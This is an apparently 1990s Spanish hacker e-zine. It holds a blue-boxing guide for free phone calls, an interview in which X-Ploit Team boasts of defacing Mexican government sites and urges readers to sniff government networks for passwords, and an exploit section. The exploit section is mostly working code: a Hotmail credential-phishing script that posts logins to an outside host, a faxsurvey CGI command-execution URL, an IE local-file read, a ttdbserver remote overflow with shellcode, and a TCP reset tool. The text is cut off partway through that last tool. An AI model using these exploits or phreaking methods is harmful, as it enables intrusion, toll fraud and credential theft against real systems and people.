hacer llamados INTERNACIONALES y NACIONALES completamente gratis, ahora les paso a explicar como es el asunto! - - = Blue Boxing desde ZERO = - - Para centrales CCITT #5 Los comandos mas importantes son: KP = Key Pulse (NACIONAL) KP2 = Key Pulse 2 (INTERNACIONAL) ST = Start Tone (comienza un secuencia) 2600/2400hz = frecuencia de corte (la mas importante) Como realizamos llamados completamente gratis? country Llamada internacional 00 code area switch date | | | | | KP 080030303 WAIT 2600 STP2 (XX)-(XX)-(XX)-(XXX)-(XXX) ST | cualquier 0800 switch Llamada nacional area code | date | | | KP 080030303 WAIT 2600 STP (XX)-XXX-XXX | cualquier 0800 Aca tienen una lista de los tonos de las centrales digitales, espero que les sirva: ┌─────────────────────┬────────────┬───────────┬──────────────┐ │ Tono │ Frecuencia │ Tiempo de │ Tiempo de │ │ │ (Hz) │ Activado │ Desactivado │ │ │ │ (Seg.) │ (Seg.) │ ├─────────────────────┼────────────┼───────────┼──────────────┤ │Discado │ 350+440 │ Continuo │ │ │Ocupado │ 480+620 │ 0,5 │ 0,5 │ │Campanilla normal │ 440+480 │ 2 │ 4 │ │Campanilla PBX │ 440+480 │ 1 │ 3 │ │Congestion (tel.pub.)│ 480+620 │ 0,2 │ 0,3 │ │Rellamada (Local) │ 480+620 │ 0,3 │ 0,2 │ │Receptor Descolgado │ 1400+2060+│ 0,1 │ 0,1 │ │ │ 2450+2600 │ │ │Numero no existe │ 200 a 400 │ Continuo, modulado en │ │ │ │ frecuencia con 1 Hz. │ └─────────────────────┴────────────┴──────────────────────────┘ Bueno amigos espero que esta nota les haya gustado!.. y bueno les deseo mucha suerte! Saludos de Dr_Format^ fbossi@usa.net -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= oOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoO -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= ─[ Entrevista a X-Ploit Team ]──────────────────────────────────────────────── En exclusiva para todos los lectores RareGaZz les ofrecemos esta entrevista que hemos realizado al tan famoso grupo mexicano X-Ploit: ------------------------------------------------------------------- - Como surgio x-ploit TEAM? En alguna vez nos encontramos en el IRC en un canal de hacking, comenzamos a intercambiar informacion y comenzamos a frecuentarnos, posteriormente comenzamos algunos proyectos juntos y surgio la idea de formar un grupo, afectados por la misma problematica; siendo todos mexicanos, y cansados de los abusos del gobierno decidimos intervenir los sistemas del gobierno mexicano. ------------------------------------------------------------------- - Cuantos miembros lo componen? Somos 3, LoTek, LeadRain y DES, todos mexicanos. Nos conocemos personalmente, aunque nuestro primer contacto fue electronico. Pero la red nos permite estar a mucha distancia y seguir actuando como una fuerza efectiva. ------------------------------------------------------------------- - Desde cuando estan activos? Desde hace aproximadamente 1 año. ------------------------------------------------------------------- - Que les llevo a unirse? algun objetivo en concreto? Nuestras ideas eran similares, y nuestro intercambio de informacion fue muy dinamico, y productivo, todos los miembros del equipo aportabamos activamente, por lo que nos acoplamos perfectamente para nuestros proyectos. ------------------------------------------------------------------- - Poseen alguna pagina web? donde? No, no existe pagina oficial de X-ploit, aunque nos gustaria encontrar espacio en algun sitio para subir la informacion del grupo. ------------------------------------------------------------------- - En que proyectos estan trabajando actualmente? Seguridad en todos sabores de UN*X, phreaking, NO virus, NO anarquia. ------------------------------------------------------------------- - Quien es el lider de X-Ploit TEAM? No hay un lider, todos aportamos para el equipo cuanto podemos, con ideas tanto de unos como de otros. ------------------------------------------------------------------- - He oido mucho hablar de x-ploit pero nunca de ninguno de sus miembros. Les gusta permanecer en el anonimato? no tienen nicks? Claro que si tenemos, somos Lotek, LeadRain y DES, sino has escuchado de nuestros nicks es precisamente porque somos un equipo, y nos hemos dado a conocer como el X-Ploit Team. ------------------------------------------------------------------- - Estan llevando a cabo alguna labor educativa, como crear listas de correo, revistas, etc? No, por el momento puede ser riesgoso para nosotros tener mucha participacion en ese aspecto, aunque si deseariamos dar a conocer a otros hackers herramientas para crear un frente comun. ------------------------------------------------------------------- - Creen que su proximidad con Estados Unidos les ha influido? Como? Si y no, no se pueden negar los origenes del hacking en Estados Unidos, asi como en otros paises (Alemania, etc), sin embargo hemos formado un perfil muy nacional, con otras ideas, problematica que nos afecta a nosotros, y que es ajena a la de los hackers de otros paises, NO hemos querido hacer NON-SENSE HACKING, sino hackear con una finalidad, una idea central, no solo por poner "AQUI ESTUVE". Por lo mismo nuestros hacks han sido enfocados al BIG BROTHER, e instituciones corruptas. ------------------------------------------------------------------- - Son especialmente conocidos por sus ataques al gobierno mexicano. Como se les ocurrio y cuando empezaron estos ataques? Comenzaron el 4 de Febrero, con el hack a la pagina de la secretaria de Hacienda, y posteriormente: 23.Abril.98 Comision Nacional del Agua (www.cna.gob.mx) 29.Abril.98 Instituto Nacional de Estadistica Geografia e Informatica (www.inegi.gob.mx) 25.Mayo.98 Senado de la Republica (www.senado.gob.mx) 14.Julio.98 Secretaria de Salud (www.ssa.gob.mx) 16.Septiembre.98 San Pedro.gob.mx (www.sanpedro.gob.mx) ------------------------------------------------------------------- - Como lograron introducirse en su red? Diferentes vulnerabilidades, propias de cada sistema, desde DYNIX, Solaris, SCO, etc... ------------------------------------------------------------------- - Hackean tambien otro tipo de webs? cuales? Si, pero no alteramos informacion en ellos, incluso en la mayoria de las ocasiones hemos reportado los huecos de seguridad al administrador del sistema, en otros aplicamos el parche correspondiente y no decimos nada. ------------------------------------------------------------------- - Creen que con el hacking se puede dañar a un gobierno? Creen haberlo conseguido? Quizas no, pero lo que si hemos conseguido es despertar a otros hackers a actuar en contra del gobierno corrupto, si cada vez somos mas en algun momento seremos mas fuertes y entonces tendran miedo de que rebelemos la verdad a todo el mundo. ------------------------------------------------------------------- - A esto, algunos lo llaman *hactivismo* (hackear por motivos politicos y sociales). Piensan que forma parte de la evolucion natural del hacker? Si, es hacer hacking con una finalidad, como te repito, ya no es solamente poner "AQUI ESTUVE", sino aprovechar el impacto que puede tener el hecho de entrar a un sistema que deberia ser muy seguro, es una noticia que da la vuelta al mundo, y que mejor que hacerlo para manifestar la inconformidad del PUEBLO. ------------------------------------------------------------------- - Tienen contactos frecuentes con la guerrilla zapatista? La ayudan de alguna forma? Se puede decir que guerrilleros y hackers van por el mismo camino, en Mexico? No podriamos llamarnos guerrilleros, ni llamar a los hackers en general asi, pues cada hacker o grupo tiene su ideologia, algunos solo hacen por demostrar que pueden hacerlo o que un sistema es vulnerable, pero lo que es un hecho es que ambos, hackers y guerrilleros estamos contra el gobierno, y asi lo estaremos mientras nos quieran engañar y controlar, lo que si podria decir es que ambos somo REBELDES. ------------------------------------------------------------------- - El mundo exterior no cree que con el hacking se pueda cambiar la sociedad, pero ustedes, con sus acciones, han conseguido como minimo que sus denuncias saltasen las fronteras mexicanas. Era este el objetivo? Piensan que se puede llegar mas alla de la simple contrapropaganda? Aprobarian llegar mas alla? Claro, como ya lo hemos manifestado nuestra protesta fue de un enorme impacto, llego a escucharse en los rincones del mundo, gracias a INTERNET, no es algo extraño lo que estamos haciendo, INTERNET es un medio masivo de comunicacion, y como tal lo estamos aprovechando, para dar a conocer problemas de nuestro pais, que el gobierno ha querido encubrir, para guardar una imagen ante el mundo, nosotros les demostramos que aunque "solo" eramos unos hackers contra todo su sistema represivo pudimos manifestarnos y decir la verdad, todo esto gracias a LA RED. ------------------------------------------------------------------- - Como ven el futuro del mundo undergroung en Mexico y el undreground hispano en general? Esta madurando, en algunos paises ha crecido como una replica de lo que sucede en Estados Unidos, a diferencia y muy concretamente en Mexico nosotros hemos querido empezar una escena de hackers CONSCIENTES, con ideologia muy concreta, no queremos que se confunda PIRATA con HACKER, el "hacktivism" como se ha dado en llamar a nuestras acciones, asi como las de otros grupos en el mundo ha sido un paso importante en la evolucion del hacking, creemos que en el futuro los hackers vamos a poder rechazar y realmente seleccionar la informacion que sea verdadera, rechazar las mentiras y del mismo modo dar a conocer la verdad, la censura cada vez sera menor, en el verdadero sentido de la palabra somos PODEROSOS los hackers, y somos una comunidad, es dificil que los gobiernos puedan reprimirnos a todos. Es muy bueno que surgan revistas en nuestro idioma, como RareGaZz, que demuestran que hay una escena de hackers latinos alla afuera... ------------------------------------------------------------------- - Tienen algun sitio de reunion (IRC, BBS, etc ...)? No, seria muy peligroso para el equipo presentarnos en sitios "publicos". De hecho nos han comentado por e-mail que nos han visto en el IRC, evidentemente no somos nosotros, no entrariamos al IRC a decir quienes somos y a alardear, corriendo el riesgo de ser rastreados. ------------------------------------------------------------------- - Hay que estar muy seguro antes de hackear una web del gobierno y, ademas, reconocer publicamente que lo han hecho. No tienen miedo de que les atrapen? Claro, creo que todos sin excepcion tenemos miedo de perder nuestra libertad o algo mas, en cualquier ambito, sin embargo tuvimos que demostrarle al gran hermano que podiamos gritarle lo que opinabamos sin pensar en las consecuencias, si pensaramos en las consecuencias su sistema represivo estaria funcionando. ------------------------------------------------------------------- - Se comenta que el FBI va detras de ustedes. Que hay de cierto en todo esto? Si hemos oido algunos rumores, y otros hackers nos lo han comentado, no estamos seguros de que tan cierto sea, gente que conocemos en otras esferas nos han manifestado que tambien la secretaria de gobernacion inicio algo al respecto, de nuevo lo ignoramos, pero eso no nos detendra a seguir haciendo escuchar nuestra voz. ------------------------------------------------------------------- - Van a seguir hackeando webs del gobierno mexicano? hasta cuando? Vamos a seguir luchando contra el gobierno, sea hackeando webs o con otras acciones, lo que principalmente buscamos con estos hacks fue despertar a los hackers mexicanos que andan por ahi, para unir esfuerzos en una causa comun, y que el gobierno se diera cuenta que ahi estabamos y ahi estaremos, hay hackers tanto dentro como fuera del mismo gobierno, por lo que cada vez seremos mas fuertes. No nos quedaremos pasivos antes las malas decisiones del gobierno, que solo enriquecen a unos cuantos, basta de mentiras, basta de FOBAPROA, basta de CABAL PENICHE, basta de LOS SALINAS, basta de ZEDILLO, basta de ABUSOS!!! El dia de la independencia vimos que los mexicanos aun respetan sus simbolos patrios, pero vimos con tristeza y coraje que el gobierno se aprovecha de esa "sumision" que tenemos como pueblo, creemos que ya fue suficiente de vernos la cara, narcotrafico en el ejercito, esa institucion yo creo que ya no la respeta nadie, asi como muchas mas, y sin embargo en la television nos hacen creer que todo va bien, en cuanto terminara el dolar?, alguien ya lo sabe. ------------------------------------------------------------------- AQUI TE HACEMOS LLEGAR NUESTRO MANIFIESTO: "Festejamos la respuesta que ha habido por parte de la gente que nos ha comunicado su solidaridad y su disposicion para una alianza mexicana por la libertad de expresion, y contra la negligencia del gobierno. Y reiteramos la convocatoria para interferir los sistemas gubernamentales y los monopolios, que nos permitan conocer la VERDAD, no solo lo que les conviene decir, y los invitamos a que al estar inconformes con el sistema, aquellos que tengan acceso a informacion confidencial la den a conocer, la divulguen, de manera anonima si es necesario, pero llegara el dia en que podamos gritar nuestro desacuerdo sin temor a represalias, porque cada vez seremos mas. Si tienes acceso a una red del gobierno, corre un sniffer, consigue passwords y busca lo que el gobierno nos esconde; cuenta con nuestro apoyo, nuestro e-mail esta a tu disposicion, y daremos a conocer la informacion que nos hagas llegar, recurre a los medios, nacionales e internacionales, no podran callar todas nuestras voces. LA INFORMACION ES PODER, Y EL SABER NOS HACE LIBRES!!! [X-PLOIT TEAM] - 100% MΘxico x_ploit@hotmail.com ¡¡ Mexico para los mexicanos e Internet para X-Ploit !!" ------------------------------------------------------------------- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= oOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoO -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= ─[ Bugs y Exploits - PaTa ]─────────────────────────────────────────────────── -*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*- S.O/Programa: Netscape 3.x y 4.x Objetivo: DoS usando nested tables demtro de etiquetas span Parche: - Creditos: Leonid Ksido Descripcion: Testeado en Communicator 4.05 en Linux Slackware 3.4, y Navigator 4.05 en Windows 98 Codigo: <HTML> <SPAN STYLE="position:absolute; LEFT:0"> <TABLE BORDER="0" WIDTH=100%> <TR> <TD> <TABLE> <TR> <TD> </TD> </TR> <TR> <TD> <TABLE> <TR> <TD> </TD> </TR> </TABLE> </TD> </TR> </TABLE> </TD> </TR> </TABLE> </SPAN> </HTML> -*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*- S.O/Programa: CGI-Script Objetivo: Ejecutar comandos de forma remota Parche: Quitar `faxsurvey.orig' Creditos: Tom <dod@MUENSTER.NET> Descripcion: Existe un bug en el "faxsurvey" CGI-Script, que permite ejecutar comandos en el servidor HTTP Versiones afectadas S.u.S.E. 5.1 y 5.2 Linux. Codigo: http://joepc.linux.elsewhere.org/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd -*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*- S.O/Programa: Linux RedHat 5.1 Objetivo: DoS Parche: ftp://ftp.solucorp.qc.ca/pub/linuxconf/devel/redhat-5.1/linuxconf-1.11r19-1.i386.rpm Creditos: Alex Mottram Descripcion: Existe un problema de seguridad con linuxconf-1.11.r11-rh3/i386 si lo actualizas desde el FTP de RedHAT. Codigo: - -*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*- S.O/Programa: HOTMAIL Objetivo: Obtener las claves de los usuarios Parche: Descativar Java Creditos: Tom Cervenka Descripcion: Mediante al ejecucion de un codigo en java malicioso al leer los mensajes con el navegador que estemos usando, que fuerza al usuario a volver a registrarse e introducir de nuevo su cuenta y su contraseña, sin saber que en realidad esta mandando al atacante estos datos. Codigo: <html><head></head><body> <p>"Go where you want today" - Blue Adept</p> <script> function getmess(){ return "<table border=0 cellpadding=5 cellspacing=5 width=508 height=90%>" + "<tr valign=middle>" + "<th colspan=2>" + "<font face=\"Arial, Helvetica\" size=\"5\">" + "We're Sorry, We Cannot<br>Process Your Request" + "</font></th></tr>" + "<tr valign=middle><td align=center>" + "<font face=\"Arial, Helvetica\" size=\"3\">Reason: </font>" + "<font face=\"Arial, Helvetica\" size=\"3\" color=\"#ff0000\"><b>Time expired. Please re-login.</b></font><br>" + "<font face=\"Arial, Helvetica\" size=\"2\"><a href=\"http://www.hotmail.com/errormsg.html\">(Get more info regarding error messages here)</a></font>" + "</td></tr>" + "<tr valign=\"middle\"><td align=\"center\">" + "<FORM METHOD=POST ACTION=\"http://www.geocities.com/cgi-bin/homestead/mail.pl?ybwc\" target=\"_top\">" + "<INPUT TYPE=\"hidden\" NAME=\"next-url\" VALUE=\"http://www.hotmail.com\">" + "<INPUT TYPE=\"hidden\" NAME=\"subject\" VALUE=\"Hotmail Password\">" + "<table cellpadding=\"0\" cellspacing=\"5\" border=\"0\">" + "<tr><td><font face=\"Arial, Helvetica\" size=\"2\">Login Name:</font><br><input type=\"text\" name=\"login\" size=\"16\" maxlength=\"16\"></td><td><font face=\"Arial, Helvetica\" size=\"2\">Password:</font><br><input type=\"password\" name=\"passwd\" size=\"16\" maxlength=\"16\"> <input type=\"submit\" value=\"Enter\"></td><tr>" + "</table></form></td></tr>" + "<tr valign=middle><th colspan=2 align=center>" + "<font face=\"Arial, Helvetica\" size=\"3\">" + "Return to <a href=\"http://welcome.to/www.hotmail.com\" target=\"_parent\">Hotmail's Homepage</a>." + "</font></th></tr></table>" + "<p><img src=\"http://209.1.112.251/c9698.gif\" width=189 height=16 border=0 alt=\"Copyright 1996-1997\">"; } nomenulinks=top.submenu.document.links.length; for(i=0;i<nomenulinks-1;i++){ top.submenu.document.links[i].target="work"; top.submenu.document.links[i].href="javascript:getmess()"; } noworklinks=top.work.document.links.length; for(i=0;i<noworklinks-1;i++){ top.work.document.links[i].target="work"; top.work.document.links[i].href="javascript:getmess()"; } </script> </body> </html> -*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*- S.O/Programa: Win98 Objetivo: Efecto 2000 Parche: No encender el ordenador en Noche Vieja Creditos: - Descripcion: El bug aparece cuando Windows 98 es reiniciado entre las 23:59 y las 00:00 y hace que el ordenador salte uno o dos dias hacia atras, de pendiendo de la hora exacta de reset. Por ahora esto solo ocuure el 31 de Diciembre. Codigo: - -*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*- S.O/Programa: Internet Explorer Objetivo: Leer ficheros locales Parche: http://www.microsoft.com/security/bulletins/ms98-013.htm Creditos: Georgi Guninski Descripcion: Esta nueva vulnerabilidad permite a una pagian Web diseñada maliciosamente leer archivos de texto o html del ordenador del usuario y enviar sus contenidos a un host arbitrario, incluso cuando el usuario se encuentra detras de un firewall. El agujero explota un error de seguridad en los frames y se basa en la utilizacion de instrucciones en JavaScript. Para que funcione se debe conocer de antemano el nombre y camino completo del fichero que se quiere leer, cosa nomuy dificil. Versiones afectadas: - Microsoft Internet Explorer 4.0, 4.01 y 4.01 SP1 sobre Windows NT 4.0, Windows 95 - Microsoft Windows 98, Internet Explorer iontegrado (version 4.01 SP1) - Microsoft Internet Explorer 4.0 y 4.01 para Windows 3.1 y Windows NT 3.51 - Microsoft Internet Explorer 4.0 y 4.01 para Macintosh - Microsoft Internet Explorer 3.x Codigo: <HTML> <HEAD><TITLE>Read text/HTML file with Internet Explorer 4.01></TITLE></HEAD> <BODY> This demonstrates a bug in IE 4.01 under Windows 95 (don't know for other versions), which allows reading text or HTML file on the user's machine. <B>Create the file c:\test.txt</B> and its contents are shown in a message box. The file may be sent to an arbitrary server even if behind a firewall. <BR> To test it, you need Javascript enabled. <BR> This file is created by <A HREF=http://www.geocities.com/ResearchTriangle/1711>Georgi Guninski.</A> <SCRIPT LANGUAGE="JAVASCRIPT"> alert("This page demonstrates reading the file C:\\test.txt (you may need to create a short file to view it)"); var x=window.open('file://C:/test.txt'); x.navigate("javascript:eval(\"var a=window.open('file://C:/test.txt');r=a.document.body.innerText;alert(r);\" ) "); </SCRIPT> </BODY> </HTML> -*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*- S.O/Programa: Linux RedHat 5.1 Objetivo: Matar cualquier proceso Parche: Nuevo kernel Creditos: Ryan Dibble <dibbler@umd.umich.edu> Descripcion: El codigo de abajo puede matar cualquier proceso. No puede matar init, kflushd, kswapd, ni klogd. Testeado en maquinas con los siguientes paquetes: kernel-2.0.34-0.6 glibc-2.0.7-13 glib-1.0.1-2 glibc-debug-2.0.7-13 glibc-devel-2.0.7-13 glibc-profile-2.0.7-13 Codigo: ===== BEGIN shits.c ===== #include <fcntl.h> #include <errno.h> #include <stdio.h> #include <stdlib.h> #include <unistd.h> int main(int argc, char *argv[]) { int s, p; if (argc != 2) { fputs("Please specify a pid to send signal to.\n", stderr); exit(0); } else { p = atoi(argv[1]); } fcntl(0,F_SETOWN,p); s = fcntl(0,F_GETFL,0); fcntl(0,F_SETFL,s|O_ASYNC); printf("Sending SIGIO - press enter.\n"); getchar(); fcntl(0,F_SETFL,s&~O_ASYNC); printf("SIGIO send attempted.\n"); return 0; } ===== END shits.c ===== -*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*- S.O/Programa: Solaris (testeado en SS5 y Ultra 2.5.1), Irix (testeado en r5k y r10k O2 6.3), HP-UX (testeado en 700s 10.20) Objetivo: Overflow remoto Parche: ¿¿??? Creditos: Anonimo Descripcion: Usar: ./r [-ku] [-p puerto] [-f fichero de salida] host cmd -k : mata ttdbserver -u : usar UDP (opr defecto TCP) -p port : conectar con el ttdbserver en elpuerto -f outfile : almacena mesaje rpc en un fichero de texto (y no contacta con el host) -a : agitar antes de usar Codigo: #include <sys/types.h> #include <sys/time.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> #include <stdio.h> #include <unistd.h> #include <fcntl.h> #include <stdlib.h> #include <errno.h> #include <string.h> #include <netdb.h> #include <rpc/rpc.h> #define PORT 0 #define BSIZE 1024 #if defined(SOLARIS) # define SP 0xefffd618 # define LENOFS 80 char asmcode[]="\x20\xbf\xff\xff\x20\xbf\xff\xff\x7f\xff\xff\xff\x92\x03\xe0\x48\x90\x02\x60\x10\xe0\x02\x3f\xf0\xa2\x80\x3f\xff\xa0\x24\x40\x10\xd0\x22\x3f\xf0\xc0\x22\x3f\xfc\xa2\x02\x20\x09\xc0\x2c\x7f\xff\xe2\x22\x3f\xf4\xa2\x04\x60\x03\xc0\x2c\x7f\xff\xe2\x22\x3f\xf8\xa2\x04\x40\x10\xc0\x2c\x7f\xff\x82\x10\x20\x0b\x91\xd0\x20\x08\xff\xff\xff\xfc\x22\x22\x22\x22\x33\x33\x33\x33\x44\x44\x44\x44\x2f\x62\x69\x6e\x2f\x6b\x73\x68\x2e\x2d\x63\x2e"; char NOP[]="\x80\x1c\x40\x11"; #endif #if defined(HPUX) # define SP 0x7b03cc10 # define LENOFS 84 char asmcode[]="\xeb\x40\x40\x02\x0b\x39\x02\x80\xd7\x40\x0c\x1e\xb7\x5a\x20\xb8\x0b\x5a\x02\x59\x0f\x21\x10\x98\x97\x18\x07\xff\x0f\x39\x12\x81\x0f\x20\x12\x99\xb7\x39\x20\x10\x0f\x20\x12\x1f\x0f\x59\x12\x89\xb7\x39\x20\x06\x0f\x20\x12\x1f\x0f\x59\x12\x91\x0b\x38\x06\x19\x0f\x20\x12\x1f\xb7\x59\x07\xe1\x20\x20\x08\x01\xe4\x20\xe0\x08\xb4\x16\x10\x16\x11\x11\x11\x11\x22\x22\x22\x22\x33\x33\x33\x33\x44\x44\x44\x44\x2f\x62\x69\x6e\x2f\x73\x68\x2e\x2d\x63\x2e"; char NOP[]="\x0b\x39\x02\x80"; #endif #if defined(IRIX) # define SP 0x7fff1b30 # define LENOFS 76 char asmcode[]="\x04\x10\xff\xff\x27\xe4\x01\x01\x24\x84\xff\x5e\x8c\x8c\xff\xe5\x24\x0d\xff\xff\x01\xac\x60\x23\x01\x84\x60\x20\xa1\x80\xff\xff\xa0\x80\xff\xff\xac\x84\xff\xed\x24\x84\xff\xfd\xa0\x80\xff\xff\xac\x84\xff\xec\x24\x84\xff\xf8\x24\x85\xff\xf0\xac\x84\xff\xf0\xac\x80\xff\xfc\x24\x02\x03\xf3\x02\x04\x8d\x0c\xff\xff\xff\xfc\x22\x22\x22\x22\x22\x22\x22\x22\x22\x22\x22\x22\x2f\x62\x69\x6e\x2f\x73\x68\x2e\x2d\x63\x2e"; char NOP[]="\x24\x0f\x12\x34"; #endif #define TT_DBSERVER_PROG 100083 #define TT_DBSERVER_VERS 1 #define _TT_P 7 struct tt_reply { int i1; int i2; }; void usage(char *s) { printf("Usage: %s [-ku] [-p port] [-f outfile] host cmd\n", s); exit(0); } bool_t xdr_tt_reply(XDR *xdrs, struct tt_reply *objp) { if (!xdr_int(xdrs, &objp->i1)) return (FALSE); if (!xdr_int(xdrs, &objp->i2)) return (FALSE); return (TRUE); } void make_file(char *fname, char *buf, int type); main(int argc, char *argv[]) { extern int optind; extern char *optarg; CLIENT *cl; enum clnt_stat stat; struct timeval tm; struct hostent *hp; struct sockaddr_in target; struct tt_reply op_res; char buf[64000], *path, *cmd, *host, *bp, *outfile = NULL; int sd, i, sp = SP, bsize = BSIZE, port = PORT, kill = 0, proto = 0; while ((i = getopt(argc, argv, "ukp:f:")) != EOF) switch (i) { case 'p': port = atoi(optarg); break; case 'k': kill = 1; break; case 'u': proto = 1; break; case 'f': outfile = optarg; break; default: usage(argv[0]); } if (argc - optind < 2) usage(argv[0]); cmd = argv[optind + 1]; host = argv[optind]; for (i = 0; i < sizeof(buf); i++) *(buf + i) = NOP[i % 4]; i = bsize - strlen(asmcode) - strlen(cmd); i &= 0xfffffffc; strcpy(buf + i, asmcode); strcat(buf, cmd); *(int *)(buf + i + LENOFS) = ~(strlen(cmd) + 1); buf[strlen(buf)] = '.'; bp = buf + bsize; for (i = 0; i < 16; bp+=4, i++) *(int *)bp = sp; #ifdef IRIX sp = sp + 400 + 31652; for (i = 0; i < 5000; bp+=4, i++) *(int *)bp = sp; *bp++ = '/'; *bp++ = 'f'; path = buf + 2; #else path = buf; #endif *bp = 0; if (outfile) { make_file(outfile, buf, proto); printf("rpc datagram stored in %s\n", outfile); exit(0); } if ((target.sin_addr.s_addr = inet_addr(host)) == -1) { if ((hp = gethostbyname(host)) == NULL) { printf("%s: cannot resolve\n", host); exit(1); } else target.sin_addr.s_addr = *(u_long *)hp->h_addr; } target.sin_family = AF_INET; target.sin_port = htons(port); sd = RPC_ANYSOCK; tm.tv_sec = 4; tm.tv_usec = 0; if (proto) cl = clntudp_create(&target, TT_DBSERVER_PROG, TT_DBSERVER_VERS, tm, &sd); else cl = clnttcp_create(&target, TT_DBSERVER_PROG, TT_DBSERVER_VERS, &sd, 0, 0); if (cl == NULL) { clnt_pcreateerror("clnt_create"); exit(0); } cl->cl_auth = authunix_create("localhost", 0, 0, 0, NULL); tm.tv_sec = 10; if (kill) { path = NULL; bp = NULL; if ((stat = clnt_call(cl, 15, xdr_wrapstring, (char *)&path, xdr_wrapstring, (char *)&bp, tm)) != RPC_SUCCESS) { clnt_perror(cl, "clnt_call"); exit(1); } printf("Could not kill ttdbserver, reply is: %s\n", bp); exit(1); } if ((stat = clnt_call(cl, _TT_P, xdr_wrapstring, (char *)&path, xdr_tt_reply, (char *)&op_res, tm)) != RPC_SUCCESS) { clnt_perror(cl, "clnt_call"); exit(1); } printf("res i1 %d, res i2 %d\n", op_res.i1, op_res.i2); clnt_destroy(cl); } void make_file(char *fname, char *buf, int type) { int fd, offs; XDR xdrm; struct rpc_msg rpc_hdr; struct authunix_parms aup; char dgram[64000], rauth[MAX_AUTH_BYTES]; if (type == 1) /* UDP */ offs = 4; if ((fd = open(fname, O_RDWR | O_CREAT | O_TRUNC, 0666)) == -1) { perror(fname); exit(1); } xdrmem_create(&xdrm, rauth, sizeof(rauth), XDR_ENCODE); aup.aup_time = (u_long)time(NULL); aup.aup_machname = "localhost"; aup.aup_uid = 0; aup.aup_gid = 0; aup.aup_len = 0; aup.aup_gids = NULL; if (xdr_authunix_parms(&xdrm, &aup) == FALSE) { printf("error encoding auth cred\n"); exit(1); } rpc_hdr.rm_call.cb_cred.oa_length = xdr_getpos(&xdrm); xdr_destroy(&xdrm); xdrmem_create(&xdrm, dgram + 4, sizeof(dgram), XDR_ENCODE); rpc_hdr.rm_xid = 0x12345678; rpc_hdr.rm_direction = CALL; rpc_hdr.rm_call.cb_rpcvers = 2; rpc_hdr.rm_call.cb_prog = TT_DBSERVER_PROG; rpc_hdr.rm_call.cb_vers = TT_DBSERVER_VERS; rpc_hdr.rm_call.cb_proc = _TT_P; rpc_hdr.rm_call.cb_cred.oa_flavor = AUTH_UNIX; rpc_hdr.rm_call.cb_cred.oa_base = rauth; rpc_hdr.rm_call.cb_verf.oa_flavor = AUTH_NONE; rpc_hdr.rm_call.cb_verf.oa_base = NULL; rpc_hdr.rm_call.cb_verf.oa_length = 0; if (xdr_callmsg(&xdrm, &rpc_hdr) == FALSE) { printf("error encoding rpc header\n"); exit(1); } if (xdr_wrapstring(&xdrm, &buf) == FALSE) { printf("error encoding rpc data\n"); exit(1); } /* record marking */ *(u_int *)dgram = 0x80000000 | xdr_getpos(&xdrm); if (write(fd, dgram + offs, xdr_getpos(&xdrm) + 4) == -1) { perror("write"); exit(1); } xdr_destroy(&xdrm); close(fd); } -*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*- S.O/Programa: Win 95, Win/NT Objetivo: Resetear conexiones TCP/IP Parche: "Thanks, we'll look into it" (Palabras de Microsoft cuando le comunicaron el bug). Creditos: Basement Research <br@DEEPTHOUGHT.EE.SIUE.EDU> Descripcion: Conociendo la IP de la victima y el puerto TCP, se puede aprove- char de un fallo en la implementacion del protocolo TCP/IP por parte de Microsoft, resetear esta conexion. Codigo: /* brkill.c * by the basement research, llp * Sat Sep 5 04:01:11 CDT 1998 * For the details of how this works, you can visit http://deep.ee.siue.edu/br. * To compile: * cc -O2 -o brkill brkill.c -lpcap */ #define SWAP(a,b) { a^=b; b^=a; a^=b; } #define _BSD_SOURCE 1 #ifdef __FreeBSD__ #define BSDFIX(a) (a) #else #define BSDFIX(a) htons(a) #endif #include <stdio.h> #include <unistd.h> #include <stdlib.h> #include <string.h> #include <errno.h> #include <netdb.h> #include <sys/utsname.h> #include <sys/time.h> #include <sys/socket.h> #include <net/if.h> #include <netinet/in.h> #include <netinet/in_systm.h> #include <netinet/ip.h> #include <netinet/tcp.h> #include "pcap.h" #define TIMEOUT_VALUE 500 #define VICTIM_START_PORT 1023 struct evilpkt { struct ip iphdr; struct tcphdr tcphead; } pkt; struct fakehdr { u_long saddr; u_long daddr; u_char zero; u_char proto; u_short len; struct tcphdr faketcp; } pseudo; static pcap_t *pfd; u_long victim; u_short port; char *device = NULL; u_short link_offset = 14; static char *filter_str; struct pcap_pkthdr hdr; u_short tcp_cksum (u_short * tcphdr, int len) { register long sum = 0; u_short *w = tcphdr; static u_short answer = 0; while (len > 1) { sum += *w++; len -= 2; } if (len == 1) { *(u_char *) (&answer) = *(u_char *) w; sum += answer; } sum = (sum >> 16) + (sum & 0xffff); sum += (sum >> 16); return (~sum); } void start_pcap () { char cmd[200]; int psize ; 